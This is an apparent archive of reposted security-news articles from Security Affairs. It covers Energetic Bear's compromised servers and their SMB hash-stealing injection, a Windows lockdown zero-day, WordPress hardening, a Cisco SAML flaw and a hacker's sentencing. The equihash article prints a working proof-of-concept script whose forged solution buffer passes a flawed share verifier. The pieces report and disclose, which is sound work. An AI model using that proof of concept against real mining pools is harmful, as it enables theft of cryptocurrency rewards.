Category Archives: Hacking

Kaspersky’s analysis of servers compromised by Energetic Bear shows the APT operates on behalf of others

Kaspersky analyzed the served compromised by the Energetic Bear APT and assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it.

Security experts at Kaspersky Lab ICS CERT have published a detailed analysis of the server compromised by the notorious Energetic Bear APT group (Dragonfly and Crouching Yeti) across the years.

The Energetic Bear APT group has been active since at least 2010 most of the victims of the group are organizations in the energy and industrial sectors.

In March 2018, the Department of Homeland Security and Federal Bureau of Investigation issued a joint technical alert to warn of attacks on US critical infrastructure powered by Russian threat actors. The US-CERT blamed the APT group tracked as DragonflyCrouching Yeti, and Energetic Bear.

A week later, the US-CERT updated its alert by providing further info that and officially linking the above APT groups to the Kremlin.

The Alert (TA18-074A) warns of “Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors,” it labels the attackers as “Russian government cyber actors.”

“This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.” reads the alert

“It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks.” 

The analysis of indicators of compromise (IoCs) shows the Dragonfly threat actor is still very active and its attacks are ongoing.

“DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks.” continues the alert. “After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).”

“The main tactics of the group include sending phishing emails with malicious documents and infecting various servers. The group uses some of the infected servers for auxiliary purposes – to host tools and logs. Others are deliberately infected to use them in waterhole attacks in order to reach the group’s main targets.” reads the report published by Kaspersky.

Most of the compromised servers were used in waterhole attacks, the others were used to host hacking tools or as a repository for data exfiltrated from target machines.

The servers analyzed by Kaspersky were located in several countries, including Russia, Ukraine, UK, Germany, Turkey, Greece, and the United States.

Below the full list of compromised servers:

Country Description Role in the attack
Russia Opposition political website Waterhole
Real estate agency Auxiliary (collecting user data in the waterhole attack)
Football club Waterhole
Developer and integrator of secure automation systems and IS consultant Waterhole
Developers of software and equipment Auxiliary (collecting user data in the waterhole attack, tool hosting)
Investment website Auxiliary (collecting user data in the waterhole attack)
Ukraine Electric power sector company Waterhole
Bank Waterhole
UK Aerospace company Waterhole
Germany Software developer and integrator Waterhole
Unknown Auxiliary (collecting user data in the waterhole attack)
Turkey Oil and gas sector enterprise Waterhole
Industrial group Waterhole
Investment group Waterhole
Greece Server of a university Auxiliary (collecting user data in the waterhole attack)
USA Oil and gas sector enterprise Waterhole
Unknown Affiliate network site Auxiliary (collecting user data in the waterhole attack)

All the servers involved in waterhole attacks were infected following the same pattern, attackers injected a link into a web page or JS file with the following file scheme: file://IP/filename.png.

Energetic Bear

The injected link is used to request an image on a remote server over the SMB protocol, with this trick attackers are able to extract victims’ user IP, username, domain name, and NTLM hash of the user’s password.

Experts observed the compromised servers were also used to conduct attacks on other resources by using several tools to scan websites and servers located in Russia, Ukraine, and Turkey, with Brazil, Georgia, Kazakhstan, Switzerland, U.S., France, and Vietnam.

“Compromised servers are in some cases used to conduct attacks on other resources. In the process of analyzing infected servers, numerous websites and servers were identified that the attackers had scanned with various tools, such as nmap, dirsearch, sqlmap, etc. (tool descriptions are provided below).” continues the report.

“The sites and servers on this list do not seem to have anything in common. Even though the scanned servers do not necessarily look like potential final victims, it is likely that the attackers scanned different resources to find a server that could be used to establish a foothold for hosting the attackers’ tools and, subsequently, to develop the attack.

Part of the sites scanned may have been of interest to the attackers as candidates for hosting waterhole resources.”

The analysis of the server used by the Energetic Bear APT revealed that many of them were used to host open-source tools, including Nmap (network analysis), Dirsearch (brute forcing directories and files on websites), Sqlmap (SQL injection exploitation), Sublist3r (enumerates website subdomains), Wpscan (WordPress vulnerability scanner), Impacket, SMBTrap, Commix (vulnerability search and command injection), Subbrute (subdomain enumeration), and PHPMailer (mail sending).

On one server Kaspersky has found a Python script named ftpChecker.py that was used for checking FTP hosts from an incoming list.

The server also contains a series of malicious php files in different directories in the nginx folder and in a working directory created by attackers on an infected web server. Experts also discovered a modified sshd with a preinstalled backdoor that is similar to a tool publicly available on GitHub that can be compiled on any OS.

“As a result of replacing the original sshd file with a modified one on the infected server, an attacker can use a ‘master password’ to get authorized on the remote server, while leaving minimal traces (compared to an ordinary user connecting via ssh).” continues Kaspersky.

“In addition, the modified sshd logs all legitimate ssh connections (this does not apply to the connection that uses the ‘master password’), including connection times, account names and passwords. The log is encrypted and is located at /var/tmp/.pipe.sock.”

According to Kaspersky, the use of publicly available tools makes hard the attribution of the infrastructure to a specific threat actor.

“The diversity of victims may indicate the diversity of the attackers’ interests. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development,” Kaspersky concludes.

Pierluigi Paganini

Security Affairs –  (Energetic Bear, APT)

The post Kaspersky’s analysis of servers compromised by Energetic Bear shows the APT operates on behalf of others appeared first on Security Affairs.

Report: Chinese Ties to US Tech Firms put Federal Supply Chain at Risk

China poses a serious and immediate cybersecurity threat to the federal supply chain in part because of connections Chinese state-owned enterprises (SOEs) have to key tech companies working in the government sector, a report recently issued by the U.S. China Commission has found. The report, undertaken by Interos Solutions and the first of its...

Read the whole entry... »

Related Stories

Orangeworm cyber espionage group target Healthcare organizations worldwide

Symantec researchers have monitored the activity of a cyber espionage group tracked as Orangeworm that targets organizations in the healthcare sector.

Security experts at Symantec have published a report on the activity of a cyber espionage group tracked as Orangeworm that targets healthcare organizations.

“Symantec has identified a previously unknown group called Orangeworm that has been observed installing a custom backdoor called Trojan.Kwampirs within large international corporations that operate within the healthcare sector in the United States, Europe, and Asia.” states the report published by Symantec.

“First identified in January 2015, Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims.”

Orangeworm was first spotted in January 2015, it appears to be focused on the healthcare industry, 40% of the targets belong to this industry

orangeworm

The post Orangeworm cyber espionage group target Healthcare organizations worldwide appeared first on Security Affairs.

Security Affairs: Google Project Zero hacker discloses a Zero-Day in Windows Lockdown Policy

Google researcher has publicly disclosed a Windows 10 zero-day that could be exploited by attackers to bypass Windows Lockdown Policy on systems with User Mode Code Integrity (UMCI).

Google has publicly disclosed a Windows 10 zero-day vulnerability that could be exploited by attackers to bypass Windows Lockdown Policy on systems with User Mode Code Integrity (UMCI) enabled and execute arbitrary code on the target system.

Project Zero hacker James Forshaw publicly disclosed the issue because the vulnerability was not fixed in a 90-day period according to the Google disclosure policy.

The zero-day affects all Windows 10 versions with UMCI enabled, Forshaw successfully exploited it on Windows 10S.

“The enlightened Windows Lockdown Policy check for COM Class instantiation can be bypassed by using a bug in .NET leading to arbitrary code execution on a system with UMCI enabled (e.g. Device Guard)” states the security advisory published by Google.

The zero-day flaw ties the way the WLDP COM Class lockdown policy behaves when a .NET COM object is instantiated.

The WLDP COM Class lockdown policy contains a hardcoded list of 8 to 50 COM objects which enlightened scripting engines can instantiate.

In order to prevent an attack, while registering an existing DLL a correct implementation of the policy should check the CLSID passed to DllGetObject against the hardcoded list.

“The WLDP COM Class lockdown policy contains a hardcoded list of 8 to 50 COM objects which enlightened scripting engines can instantiate. Excluding issues related to the looking up of the correct CLSID (such as previously reported abuse of TreatAs case 40189).” continues the analysis.

“This shouldn’t be a major issue even if you can write to the registry to register an existing DLL under one of the allowed COM CLSIDs as a well behaved COM implementation should compare the CLSID passed to DllGetObject against its internal list of known objects.”

Google expert discovered that when a .NET COM object is instantiated, the CLSID passed to mscoree’s DllGetClassObject is only used to look up the registration information in HKCR, the CLSID is thrown away, and the .NET object created.

This means that an attacker can add registry keys, including to HKCU, that would load an arbitrary COM visible class under one of the trusted CLSIDs.

“This has a direct impact on the class policy as it allows an attacker to add registry keys (including to HKCU) that would load an arbitrary COM visible class under one of the allowed CLSIDs. As .NET then doesn’t care about whether the .NET Type has that specific GUID you can use this to bootstrap arbitrary code execution,” continues the analysis.

Windows Lockdown Policy

The Google researcher published a Proof of Concept code for the vulnerability that is composed of two files:

  • an .INF to set-up the registry.
  • a .SCT created with the DotNetToJScript free tool that could be used to load an untrusted .NET assembly into memory to display a message box.

The researcher reported the vulnerability to Microsoft on January 19, but the tech giant hasn’t addressed it in 90 days.

“This issue was not fixed in April patch Tuesday therefore it’s going over deadline. This issue only affects systems with Device Guard enabled (such as Windows 10S) and only serves as a way of getting persistent code execution on such a machine. It’s not an issue which can be exploited remotely, nor is it a privilege escalation,” added the expert.

The expert highlighted that attackers need to gain access to the system to exploit the flaw and install registry entries.

Pierluigi Paganini

(Security Affairs – Windows Lockdown Policy, 0-day)

The post Google Project Zero hacker discloses a Zero-Day in Windows Lockdown Policy appeared first on Security Affairs.



Security Affairs

Google Project Zero hacker discloses a Zero-Day in Windows Lockdown Policy

Google researcher has publicly disclosed a Windows 10 zero-day that could be exploited by attackers to bypass Windows Lockdown Policy on systems with User Mode Code Integrity (UMCI).

Google has publicly disclosed a Windows 10 zero-day vulnerability that could be exploited by attackers to bypass Windows Lockdown Policy on systems with User Mode Code Integrity (UMCI) enabled and execute arbitrary code on the target system.

Project Zero hacker James Forshaw publicly disclosed the issue because the vulnerability was not fixed in a 90-day period according to the Google disclosure policy.

The zero-day affects all Windows 10 versions with UMCI enabled, Forshaw successfully exploited it on Windows 10S.

“The enlightened Windows Lockdown Policy check for COM Class instantiation can be bypassed by using a bug in .NET leading to arbitrary code execution on a system with UMCI enabled (e.g. Device Guard)” states the security advisory published by Google.

The zero-day flaw ties the way the WLDP COM Class lockdown policy behaves when a .NET COM object is instantiated.

The WLDP COM Class lockdown policy contains a hardcoded list of 8 to 50 COM objects which enlightened scripting engines can instantiate.

In order to prevent an attack, while registering an existing DLL a correct implementation of the policy should check the CLSID passed to DllGetObject against the hardcoded list.

“The WLDP COM Class lockdown policy contains a hardcoded list of 8 to 50 COM objects which enlightened scripting engines can instantiate. Excluding issues related to the looking up of the correct CLSID (such as previously reported abuse of TreatAs case 40189).” continues the analysis.

“This shouldn’t be a major issue even if you can write to the registry to register an existing DLL under one of the allowed COM CLSIDs as a well behaved COM implementation should compare the CLSID passed to DllGetObject against its internal list of known objects.”

Google expert discovered that when a .NET COM object is instantiated, the CLSID passed to mscoree’s DllGetClassObject is only used to look up the registration information in HKCR, the CLSID is thrown away, and the .NET object created.

This means that an attacker can add registry keys, including to HKCU, that would load an arbitrary COM visible class under one of the trusted CLSIDs.

“This has a direct impact on the class policy as it allows an attacker to add registry keys (including to HKCU) that would load an arbitrary COM visible class under one of the allowed CLSIDs. As .NET then doesn’t care about whether the .NET Type has that specific GUID you can use this to bootstrap arbitrary code execution,” continues the analysis.

Windows Lockdown Policy

The Google researcher published a Proof of Concept code for the vulnerability that is composed of two files:

  • an .INF to set-up the registry.
  • a .SCT created with the DotNetToJScript free tool that could be used to load an untrusted .NET assembly into memory to display a message box.

The researcher reported the vulnerability to Microsoft on January 19, but the tech giant hasn’t addressed it in 90 days.

“This issue was not fixed in April patch Tuesday therefore it’s going over deadline. This issue only affects systems with Device Guard enabled (such as Windows 10S) and only serves as a way of getting persistent code execution on such a machine. It’s not an issue which can be exploited remotely, nor is it a privilege escalation,” added the expert.

The expert highlighted that attackers need to gain access to the system to exploit the flaw and install registry entries.

Pierluigi Paganini

(Security Affairs – Windows Lockdown Policy, 0-day)

The post Google Project Zero hacker discloses a Zero-Day in Windows Lockdown Policy appeared first on Security Affairs.

Take These Steps to Secure Your WordPress Website Before It’s Too Late

You might have heard that WordPress security is often referred to as hardening, WordPress website security is all about putting locks on doors and windows and having lookouts on each of your “towers.”

You might have heard that WordPress security is often referred to as “hardening.” While the name might cause a few eyebrows to raise, overall, it makes sense. To clarify, the process of adding security layers is similar to boosting the reinforcements to your home, castle, or fort. In other words, WordPress website security is all about putting locks on doors and windows and having lookouts on each of your “towers.”

While this may be all good, what can you genuinely do to improve your website’s security – at the same time giving your readers and customers the guarantee that their sensitive information won’t fall into the wrong hands?

Wordpress website security

1. Perform all WordPress updates

Although it can seem impossible that something as simple as keeping up with updates would make any difference, in actuality, it does have a considerable impact. This means that whenever you log in and see the “Update Available” notification, you should make time to click. Of course, this is where having regular back-ups will also give your peace of mind that at the end of the process nothing will be broken.

2. Add Two-Step Authentication

Another excellent way to prevent force attacks on your site is by setting up a much-needed two-step authentication process. If you have it for your Gmail or Yahoo account, then you should definitely have one for a website which could be used by hundreds or more users.

The two-step measure means that you’ll be asked to input a password after a code is sent to your phone or email. Often, the second login code is sent via SMS, but you change that to your preferences.

You also have the option of adding different plug-ins, including Google Authenticator, Clef, or Duo Two-Factor Authentication.

3. Panic Button: Website Lockdown

The lockdown feature is commonly enabled when multiple failed login attempts are made, which can help against pesky and persistent brute force attempts. In this case, whenever a hacker tries to input the wrong password multiple times, the website shuts down and displays an “error” message –all while you get notified of this unauthorized activity.

Again, you can use different plug-ins to use, and one of our favorites is the iThemes Security – by using it, you can directly specify a certain number of failed login attempts after which the system bans the attacker’s IP address.

4. Use Your Email to Login

When trying to sign in, you have to choose a username. Our recommendation would be using an email ID instead of a username since the latter is more accessible to predict and hack. Plus, WordPress website accounts require a unique email address, which adds another layer of security.

5. Use SSL To Encrypt Data

SSL, otherwise known as a Secure Socket Layer, is a smart way of securing the admin panel by yourself –making sure that the transfer of data between the server and users is safe.

Overall, this measure makes it hard for hackers to breach the connection or spoof your info, and the best part is that getting an SSL certificate for your WordPress website is a piece of cake. While you can separately purchase one from a dedicated company, you can also ask your hosting solution to provide you with one – it may even be an option that comes with their package.

SSL, otherwise known as a Secure Socket Layer, is a smart way of securing the admin panel by yourself –making sure that the transfer of data between the server and users is safe.

Overall, this measure makes it hard for hackers to breach the connection or spoof your info, and the best part is that getting an SSL certificate for your WordPress is a piece of cake. While you can separately purchase one from a dedicated company, you can also ask your hosting solution to provide you with one – it may even be an option that comes with their package.

All SSL certificates have an expiration date, meaning that they’ll need to be reissued. In some cases you’ll need to manually approve or cancel your certificate. Because each email handles things a bit differently, you should go to your hosting provider for more information. Alternatively, go to the site of Bluehost, as there is a whole section on how you can accept the new SSL into your application.

After all, it’s noteworthy to realize that an SSL certificate will also affect how your website ranks on Google because sites which incorporate SSLs are more secure – ultimately leading to more traffic.

6. Backup your WordPress website

We’re briefly mentioned this point before, but just to emphasize the importance, you have to get into the habit of organizing scheduled backups. Why is it important? Well, because, for example, if your site is compromised, you’ll be able to restore a prior version with losing your data. There are multiple automated solutions out there, including BackupBuddy, VaultPress, and many others.

Another great advice is using reliable hosting solutions which can ensure consistent backups of information, helping you achieve greater peace of mind. For example, Bluehost is excellent at protecting your business from involuntary data loss. To learn more and use their coupon to get a discount, go to the site.

7. Cut Back on Plugin Use

Although it may seem hard, you should make the effort of limiting the total number of plugins you install on your site. You need to be picky because it’s not just about security –it’s about overall performance.

To better explain, loading your website with numerous plugins will slow it down significantly. Thus, if you don’t need it, take the minimalist approach and skip it. Also, the fewer plugins you have, the fewer chances you give hackers to access your info. Two birds with one stone.

8. Hide Author Usernames

When you leave the WordPress defaults just as they are, it can be effortless to find the author’s username. Moreover, it’s not uncommon that the primary author on the site is also the administrator, which makes things even easier for hackers. At any point that you’re handing your information up to hackers on a silver plate, you are maximizing the chances that your site will eventually be compromised.

According to experts, including the well-regarded DreamHost, it’s good practice to hide the author’s username. It’s relatively easy to achieve, as you need to add some code to your site. Once that is done and dusted, the code will act as a curtain or veil where the admin’s information won’t be displayed by using an input – instead, they will be sent back to your homepage.

 

Written by Ali Qamar, Founder/Chief Editor at Cyberogism.com

Ali QamarAuthor Bio:
Ali Qamar is a privacy and cyber security enthusiast, his work has been featured in many major tech and security blogs including InfosecInstitute, Hackread, ValueWalk, Intego, and SecurityAffairs to name a few. He runs SpyAdvice.com currently. Follow Ali on Twitter @AliQammar57

 

 

Pierluigi Paganini

(Security Affairs – WordPress website, security)

The post Take These Steps to Secure Your WordPress Website Before It’s Too Late appeared first on Security Affairs.

CVE-2018-0229 flaw in SAML implementation threatens Firepower, AnyConnect and ASA products

Cisco has announced a set of security patches that address the CVE-2018-0229 vulnerability in its implementation of the Security Assertion Markup Language (SAML).

The CVE-2018-0229 flaw could be exploited by an unauthenticated, remote attacker to establish an authenticated AnyConnect session through an affected device running ASA or FTD Software.

“A vulnerability in the implementation of Security Assertion Markup Language (SAML) Single Sign-On (SSO) authentication for Cisco AnyConnect Secure Mobility Client for Desktop Platforms, Cisco Adaptive Security Appliance (ASA) Software, and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to establish an authenticated AnyConnect session through an affected device running ASA or FTD Software.” reads the security advisory published by CISCO.

“The authentication would need to be done by an unsuspecting third party.”

The CVE-2018-0229 flaw affects the following Cisco solutions:

  • Single sign-on authentication for the AnyConnect desktop mobility client;
  • Adaptive Security Appliance (ASA) software; and
  • Firepower Threat Defense (FTD) software.

According to Cisco, the flaw exists because there the ASA or FTD Software doesn’t implement any mechanism to detect that the authentication request originates from the AnyConnect client directly.

An attacker could exploit the CVE-2018-0229 vulnerability by tricking victims into clicking a specifically crafted link and authenticating using the company’s Identity Provider (IdP). In this scenario, the attacker can hijack a valid authentication token and use that to establish and set up an AnyConnect session through an affected device running ASA or FTD Software.

CVE-2018-0229

The flaw affects the Cisco AnyConnect Secure Mobility Client, and ASA Software and FTD Software configured for SAML 2.0-based SSO for AnyConnect Remote Access VPN that is running on the following Cisco products:

  • 3000 Series Industrial Security Appliances (ISA)
  • ASA 5500 Series Adaptive Security Appliances
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4100 Series Security Appliance
  • Firepower 9300 ASA Security Module
  • FTD Virtual (FTDv)

Cisco confirmed that only ASA software running version 9.7.1 and later are vulnerable, the issue also affects FTD software running version 6.2.1 and later, and AnyConnect version 4.4.00243 and later.

Pierluigi Paganini

(Security Affairs – CVE-2018-0229, CISCO)

The post CVE-2018-0229 flaw in SAML implementation threatens Firepower, AnyConnect and ASA products appeared first on Security Affairs.

Security Affairs newsletter Round 159 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Microsoft engineer charged with money laundering linked to Reveton ransomware
·      TrueMove H, the biggest 4G mobile operator in Thailand suffered a data leak
·      UK GCHQ director confirmed major cyberattack on Islamic State
·      Attackers exfiltrated a casinos high-roller list through a connected fish tank
·      Bitcoin web wallet addresses generated with a flawed library are exposed to brute-force attacks
·      Massive Ransomware attack cost City of Atlanta $2.7 million
·      Talos experts found many high severity flaws in Moxa EDR-810 industrial routers
·      Roaming Mantis Malware Campaign Leverages Hacked Routers to Infect Android Users With Banking Trojan
·      UK GCHQ spy agency warns telcos of the risks of using ZTE equipment and services
·      UK NCSC, DHS and the FBI Warn of Russian hacking campaign on Western networks
·      A flaw could allow easy hack of LG Network-attached storage devices
·      Intel announced the new Threat Detection Technology and Security Essentials
·      Probably you ignore that Facebook also tracks non-users across the web
·      ZLAB MALWARE ANALYSIS REPORT: RANSOMWARE-AS-A-SERVICE PLATFORMS
·      Experts are observing Drupalgeddon2 (CVE-2018-7600) attacks in the wild
·      Hacking Cisco WebEx with a malicious Flash file. Patch it now!
·      New Windows Defender Browser Protection Chrome extension aims to protect them from online threats.
·      Private Intelligence agency LocalBlox leaked 48 Million personal data records
·      Rockwell Automation Allen-Bradley Stratix and ArmorStratix switches are exposed to hack due to Cisco IOS flaws
·      A flaw in LinkedIn feature allowed user data harvesting
·      At least 20 Million Chrome users have installed malicious Ad Blockers from Chrome store
·      Exclusive – APT group exploited still unpatched zero-day in IE dubbed ‘double play
·      iOS users can now use Google prompt on their devices via the Gmail app
·      AlienVault presents OTX Endpoint Threat Hunter, its innovative free endpoint scanning service
·      Attackers Fake Computational Power to Steal Cryptocurrencies from equihash Mining Pools
·      Twitter bans Kaspersky from advertising its products through its platform
·      UK Teenager Kane Gamble who hacked CIA Chief and other US intel officials gets 2-year jail sentence

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 159 – News of the week appeared first on Security Affairs.

Twitter bans Kaspersky from advertising its products through its platform

Twitter bans Kaspersky Lab from advertising its solutions on the platform citing DHS ban for its alleged ties with the Russian intelligence.

Twitter bans Kaspersky Lab from advertising on its platform citing DHS ban for its alleged ties with Russian intelligence agencies.

“At the end of January of this year, Twitter unexpectedly informed us about an advertising ban on our official accounts where we announce new posts on our various blogs on cybersecurity (including, for example, Securelist and Kaspersky Daily) and inform users about new cyberthreats and what to do about them.” reads an open letter sent to the management of Twitter by Kaspersky. “In a short letter from an unnamed Twitter employee, we were told that our company “operates using a business model that inherently conflicts with acceptable Twitter Ads business practices.”

According to Twitter, this is a policy decision anyway the social media allows Kaspersky Lab to remain an organic user on the platform in accordance with his Rules.

Twitter bans Kaspersky

In September, the US Department of Homeland security banned government agencies for using software products developed by Kaspersky Labs. The ban was the response to the concerns about possible ties between Kaspersky and Russian intelligence agencies.

According to The Washington Post, which first reported the news, the order applies to all civilian government networks, but not the military ones.

In July, the US General Services Administration announced that the security firm Kaspersky Lab was deleted from lists of approved vendors.

The US government banned Kaspersky solutions amid concerns over Russian state-sponsored hacking.

In September, US Homeland Security issued a Binding Operational Directive that orders agencies to remove products developed by Kaspersky Lab within 90 days.

The Twitter’s decision is directly linked to the ban, it is the first social media platform to adopt this line against the security giant.

In October, both Best Buy and Office Depot decided to stop the sale of Kaspersky products due to the US ban.

In response to the ban, Kaspersky has repeatedly denied the accusations and it announced the launch of a Global Transparency Initiative that involves giving partners access to the source code of its solutions.

Eugene Kaspersky is disappointed for this decision as stated in the open letter.

“Huh? I read this formulation again and again but still couldn’t for the life of me understand how it might relate to us. One thing I can say for sure is this: we haven’t violated any written – or unwritten – rules, and our business model is quite simply the same template business model that’s used throughout the whole cybersecurity industry: We provide users with products and services, and they pay us for them.” continues the letter. “What specific (or even non-specific) rules, standards and/or business practices we violated are not stated in the letter. In my view, the ban itself contradicts Twitter’s declared-as-adopted principle of freedom of expression. I’ll return to that point in a minute, but first let’s look at the others:”

Back to the Twitter ban, Kaspersky announced that it will donate this year’s Twitter advertising budget to the Electronic Frontier Foundation.

“By the way, if you think we’re doing this simply to get our advertising back – you’re wrong. There are many other ways to get information to interested parties. Which got me thinking…” concluded the letter.

“No matter how this situation develops, we won’t be doing any more advertising on Twitter this year. The whole of the planned Twitter advertising budget for 2018 will instead be donated to the Electronic Frontier Foundation (EFF). They do a lot to fight censorship online.”

Pierluigi Paganini 

(Security Affairs – Kaspersky Lab, Twitter bans)

The post Twitter bans Kaspersky from advertising its products through its platform appeared first on Security Affairs.

Attackers Fake Computational Power to Steal Cryptocurrencies from equihash Mining Pools

Security experts at 360 Core Security have recently detected a new type of attack which targets some equihash mining pools.

After analysis, they found out the attacked equihash mining pools are using a vulnerable equihash verifier

(equihashverify : https://github.com/joshuayabut/equihashverify) to verify miners’ shares.

There is a logic vulnerability in this verifier, so attacker can easily fake mining shares which can bypass the equihash solution verifier without using so much computing power.

This vulnerability has a wide impact because the verifier (equihashverify) is previously used by the Zcash official open source mining pool (node-stratum-pool), and many new cryptocurrencies which use equihash as PoW algorithm are forked from this pool.

Equihash is a memory-oriented Proof-of-Work algorithm developed by the University of Luxembourg’s Interdisciplinary Centre for Security, Reliability and Trust (SnT).

The cryptocurrency ZCash integrated Equihash in April 2016, for reasons such as security, privacy, and ASIC miner resistance.

According to the CryptoLUX scientists, the algorithm permits avoiding centralization of the mining process in the hands of a few first-class miners with specialized mining hardware, thus contributing to the “democratization” of digital currencies based on Equihash.

equihash mining pools

Running Equihash will use quite a lot of memory which means how much you can mine depends on the volume of your computing memory. This makes it impossible to customize a low-cost mining hardware in a short time.

The vulnerability in this report is not a vulnerability of Equihash, but a vulneranility of the implementation of Equihash solution verifier. Here is the detail:

In file equi.c, we can find the function bool verifyEH(const char *hdr, const char *soln). The parameter hdr stands for the blockheader and the parameter soln={x1,x2,…,x512} stands for the user summited solution for Equihash.

The algorithm computes:

Vhash=hash(hdr,x1)^ hash(hdr,x2) ^…^. hash(hdr,x512);

The next step is to check if all the returned values in Vhash are zeros. If they all equal to zero, return true.

If not, return false. It seems to be feasible; however, things are different in reality because there are multiple vulnerabilities in the algorithm.

The simplest one is that the function does not check whether xi is duplicated. So, if the attacker provides a solution with {x1=1,x2=1,x3=1,…,x512=1}, then he can bypass the equihash verifier for any blockheader.

Node-stratum-pool has changed the dependency of Equihashverify to a zencash official equihashverify (https://github.com/zencashofficial/equihashverify.git). However, many other smaller cryptocurrencies and mining pools haven’t updated their dependencies yet. Attacks are happening in the wild, so please update yours in time.

The simple POCs are following:

var ev = require(‘bindings’)(‘equihashverify.node’);

header = Buffer(‘0400000008e9694cc2120ec1b5733cc12687b609058eec4f7046a521ad1d1e3049b400003e7420ed6f40659de0305ef9b7ec037f4380ed9848bc1c015691c90aa16ff3930000000000000000000000000000000000000000000000000000000000000000c9310d5874e0001f000000000000000000000000000000010b000000000000000000000000000040’, ‘hex’);

soln = Buffer(‘0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f’, ‘hex’);

console.log(ev.verify(header, soln));

About the author: 360 Core Security

Original post:

http://blogs.360.cn/blog/attackers-fake-computational-power-to-steal-cryptocurrencies-from-mining-pools/

Pierluigi Paganini

(Security Affairs – Cryptocurrencies, hacking equihash mining pools)

The post Attackers Fake Computational Power to Steal Cryptocurrencies from equihash Mining Pools appeared first on Security Affairs.

UK Teenager Kane Gamble who hacked CIA Chief and other US intel officials gets 2-year jail sentence

UK teenager Kane Gamble (18) who broke into the email accounts of top US intelligence and security officials including the former CIA chief John Brennan. was sentenced to two years in prison.

The British hacker Kane Gamble (18) who broke into the email accounts of top US intelligence and security officials including the former CIA chief John Brennan. was sentenced to two years in prison on Friday.

The Gamble shared some of the material he stole from its victims to WikiLeaks.

The British teenager from Coalville, Leicester, was arrested at his home on February 9, 2017, in October, he admitted in a British court to have attempted to hack into the computers of top US officials.

Kane Gamble pleaded guilty to ten charges related to the attempted intrusions occurred between late 2015 and early 2016.

The teenager pleaded guilty to eight charges of performing a function with intent to gain unauthorized access, and two charges of unauthorized acts with intent to compromise the operation of a computer.

Gamble targeted the US Department of Justice and many other senior American security officials from his home in the East Midlands region of England.

The list of targeted officials is long and includes James Clapper, the Director of National Intelligence under President Obama’s administration and the deputy director of the FBI Jeh Johnson.

